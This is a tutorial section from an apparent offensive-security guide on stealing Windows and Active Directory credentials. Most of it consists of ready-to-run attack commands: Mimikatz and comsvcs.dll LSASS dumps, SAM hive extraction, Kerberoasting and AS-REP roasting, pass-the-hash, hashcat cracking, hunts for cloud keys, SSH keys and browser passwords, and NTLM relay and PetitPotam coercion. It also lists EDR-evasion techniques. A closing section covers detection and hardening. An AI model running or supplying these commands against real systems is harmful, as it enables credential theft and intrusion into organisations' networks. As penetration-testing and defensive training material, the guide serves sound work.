Credential Access: Keys to the Kingdom

Credentials are the ultimate prize. With valid credentials, attackers don't need exploits—they just log in. This section covers how credentials are stolen from compromised systems.

Why Credentials Matter

Initial access gets you one machine. Credentials get you everywhere that user can go—and often more.

Memory Credential Extraction

Windows stores credentials in memory for single sign-on convenience. The LSASS (Local Security Authority Subsystem Service) process contains plaintext passwords, NTLM hashes, and Kerberos tickets.

Mimikatz: The Swiss Army Knife

Mimikatz is the most powerful credential extraction tool. It reads credentials directly from LSASS memory and can perform various token manipulation attacks.

# Elevate to debug privileges
mimikatz # privilege::debug
Privilege '20' OK

# Dump all credentials from memory
mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 12345678 (00000000:00bc614e)
Session           : Interactive from 1
User Name         : admin
Domain            : CORP
Logon Server      : DC01
        msv :
         [00000003] Primary
         * Username : admin
         * Domain   : CORP
         * NTLM     : aad3b435b51404eeaad3b435b51404ee
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
        wdigest :
         * Username : admin
         * Domain   : CORP
         * Password : SuperSecretP@ss!
        kerberos :
         * Username : admin
         * Domain   : CORP.LOCAL
         * Password : SuperSecretP@ss!

LSASS Dumping Techniques

If you can't run Mimikatz directly on the target, dump LSASS memory and analyze offline.

# Task Manager (GUI)
# Right-click lsass.exe → Create dump file

# ProcDump (Sysinternals - signed by Microsoft)
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# comsvcs.dll (No external tools)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\temp\lsass.dmp full

# PowerShell (Out-Minidump)
Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump

# Mimikatz - Offline analysis
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

LSASS DUMP EVASION:

SIGNED TOOLS (Less suspicious):
├── ProcDump.exe (Sysinternals - Microsoft signed)
├── SQLDumper.exe (SQL Server component)
├── comsvcs.dll (Built into Windows)
└── Task Manager (GUI only)

DIRECT MEMORY ACCESS:
├── NtReadVirtualMemory API
├── MiniDumpWriteDump API
├── Snapshot + file copy
└── PPL bypass techniques

EDR EVASION:
├── Unhook NTDLL before dump
├── Direct syscalls
├── Handle duplication
├── Silent process exit (dump on crash)
└── Custom minidump implementation

SAM & Registry Credentials

The Security Account Manager (SAM) database stores local account password hashes. Domain credentials are in NTDS.dit on domain controllers.

# Save registry hives (requires admin)
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
reg save HKLM\SECURITY security.hive

# Extract hashes with secretsdump (Impacket)
secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL

# Or use Volume Shadow Copy (VSS)
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .

# Mimikatz from live system
mimikatz # lsadump::sam
mimikatz # lsadump::secrets

Kerberos Attacks

Kerberos is the default authentication protocol in Active Directory environments. Several attack techniques target Kerberos tickets and service accounts.

Kerberoasting

Service accounts with SPNs have their password hashes embedded in Kerberos tickets. Any domain user can request these tickets and crack them offline.

# Rubeus - Request service tickets
Rubeus.exe kerberoast /outfile:hashes.txt

# Impacket - GetUserSPNs
GetUserSPNs.py -request -dc-ip 10.10.10.1 corp.local/user:password

# PowerView
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash

# Crack with Hashcat
hashcat -m 13100 hashes.txt wordlist.txt

# Crack with John
john --format=krb5tgs hashes.txt --wordlist=wordlist.txt

AS-REP Roasting

Accounts without Kerberos pre-authentication can have their AS-REP response cracked offline. Look for accounts with "Do not require Kerberos preauthentication" set.

# Find vulnerable accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}

# Rubeus
Rubeus.exe asreproast /outfile:asrep.txt

# Impacket (no creds needed!)
GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt

# Crack
hashcat -m 18200 asrep.txt wordlist.txt

Pass-the-Hash / Pass-the-Ticket

CREDENTIAL REUSE ATTACKS:

PASS-THE-HASH (PtH):
├── Use NTLM hash instead of password
├── Works with SMB, WinRM, WMI, etc.
├── Tools: mimikatz, pth-winexe, CrackMapExec
└── Example: pth-winexe -U admin%hash //target cmd.exe

PASS-THE-TICKET (PtT):
├── Inject Kerberos ticket into session
├── Access resources as that user
├── Tools: Mimikatz, Rubeus
└── mimikatz # kerberos::ptt ticket.kirbi

OVERPASS-THE-HASH:
├── Use NTLM hash to request Kerberos ticket
├── Avoids NTLM-specific detections
├── mimikatz # sekurlsa::pth /user:admin /domain:corp /ntlm:hash
└── Results in legitimate Kerberos authentication

Password Cracking

Once you have hashes, crack them offline using GPU-accelerated tools.

# Common hash types
hashcat -m 1000 ntlm.txt wordlist.txt           # NTLM
hashcat -m 3000 lm.txt wordlist.txt             # LM (legacy)
hashcat -m 5600 netntlmv2.txt wordlist.txt      # NetNTLMv2
hashcat -m 13100 kerberoast.txt wordlist.txt    # Kerberoast
hashcat -m 18200 asrep.txt wordlist.txt         # AS-REP

# Attack modes
hashcat -a 0 hash.txt wordlist.txt              # Dictionary
hashcat -a 3 hash.txt ?a?a?a?a?a?a              # Brute force
hashcat -a 6 hash.txt wordlist.txt ?d?d?d?d     # Hybrid

# Rules for variations
hashcat -m 1000 hash.txt wordlist.txt -r rules/best64.rule

# Show cracked passwords
hashcat -m 1000 hash.txt --show

CRACKING STRATEGY:

QUICK WINS:
├── Known weak passwords (Password1!, Summer2024)
├── Company name variations
├── Common patterns + years
├── Previous breach data
└── Top 10000 passwords

RULE-BASED:
├── best64.rule - Common transformations
├── d3ad0ne.rule - Aggressive mutations
├── OneRuleToRuleThemAll - Comprehensive
└── Custom rules for target

WORDLISTS:
├── rockyou.txt (14M passwords)
├── SecLists (various)
├── CrackStation (15GB)
├── Company-specific (scrape website)
└── Previously cracked passwords

Credential Files

Credentials are often stored in files throughout the system - browsers, config files, scripts, and cloud provider settings.

# Browser credentials (use tools like SharpChromium)
SharpChromium.exe logins
SharpWeb.exe all

# Common credential locations
dir /s /b *password* *credential* *secret* *.config 2>nul
findstr /si password *.xml *.ini *.txt *.config

# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# SSH keys
dir /s /b id_rsa* id_dsa* id_ecdsa* id_ed25519* 2>nul

# Cloud credentials
type %USERPROFILE%\.aws\credentials
type %USERPROFILE%\.azure\accessTokens.json

# Git credentials
type %USERPROFILE%\.git-credentials
git config --list

HIGH-VALUE CREDENTIAL LOCATIONS:

WINDOWS:
├── unattend.xml (deployment passwords)
├── web.config (connection strings)
├── Groups.xml (GPP passwords - CVE-2014-1812)
├── *.rdp files (saved credentials)
├── WinSCP.ini / PuTTY sessions
├── KeePass databases (*.kdbx)
└── Credential Manager (vaultcmd)

LINUX:
├── /etc/shadow (user hashes)
├── ~/.bash_history (commands with passwords)
├── ~/.ssh/* (private keys)
├── /var/log/* (logged passwords)
├── .env files (API keys)
├── wp-config.php (database creds)
└── /home/*/.aws/credentials

BROWSERS:
├── Chrome: Login Data (SQLite)
├── Firefox: logins.json + key4.db
├── Edge: Login Data (Chromium-based)
└── IE: Credential Manager

Network Credential Capture

Intercept credentials on the wire using MITM attacks and protocol weaknesses.

# Start Responder to capture NetNTLMv2 hashes
sudo responder -I eth0 -wrf

# Captured hashes appear as:
# [SMB] NTLMv2-SSP Hash : CORP\admin::CORP:1122334455667788:...

# Relay instead of capture (ntlmrelayx)
sudo ntlmrelayx.py -tf targets.txt -smb2support

# Force authentication with various coercion methods
# PetitPotam, PrinterBug, etc.
python3 PetitPotam.py attacker_ip dc_ip

Detection & Defense

CREDENTIAL THEFT DETECTION:

LSASS ACCESS:
├── Sysmon Event ID 10 (ProcessAccess to lsass.exe)
├── Windows Defender Credential Guard alerts
├── EDR detection of Mimikatz signatures
├── Unusual processes accessing lsass
└── Minidump file creation in temp folders

KERBEROS ATTACKS:
├── Event ID 4769 - TGS requests (Kerberoasting)
├── Event ID 4768 - AS-REQ without preauth (AS-REP)
├── High volume ticket requests from single source
├── RC4 encryption in Kerberos (downgrade)
└── Service ticket requests for sensitive SPNs

NETWORK CAPTURE:
├── LLMNR/NBT-NS traffic (should be disabled)
├── Responder-like behavior on network
├── SMB connections to unexpected hosts
├── NTLM authentication where Kerberos expected
└── Authentication to attacker-controlled hosts

CREDENTIAL FILE ACCESS:
├── Access to SAM/SYSTEM/SECURITY hives
├── VSS snapshot creation
├── Browser credential file access
├── Mass file searches for passwords
└── Registry queries for cached credentials

CREDENTIAL THEFT PREVENTION:

MEMORY PROTECTION:
├── Enable Credential Guard (Windows 10/Server 2016+)
├── Protected Users security group
├── LSA Protection (RunAsPPL)
├── Disable WDigest authentication
└── Disable NTLM where possible

PASSWORD POLICY:
├── Long passwords (15+ chars) or passphrases
├── MFA for privileged accounts
├── Managed Service Accounts (MSA/gMSA)
├── Regular password rotation for service accounts
└── Different passwords per system (LAPS)

NETWORK HARDENING:
├── Disable LLMNR and NBT-NS
├── Enable SMB signing
├── Require Kerberos (disable NTLMv1)
├── Network segmentation
└── Privileged Access Workstations (PAW)

MONITORING:
├── Honey accounts (fake high-value targets)
├── Canary credentials in files
├── Alert on use of cached credentials
├── Monitor for credential dumping tools
└── Track authentication anomalies

Tools Reference

MITRE ATT&CK Mapping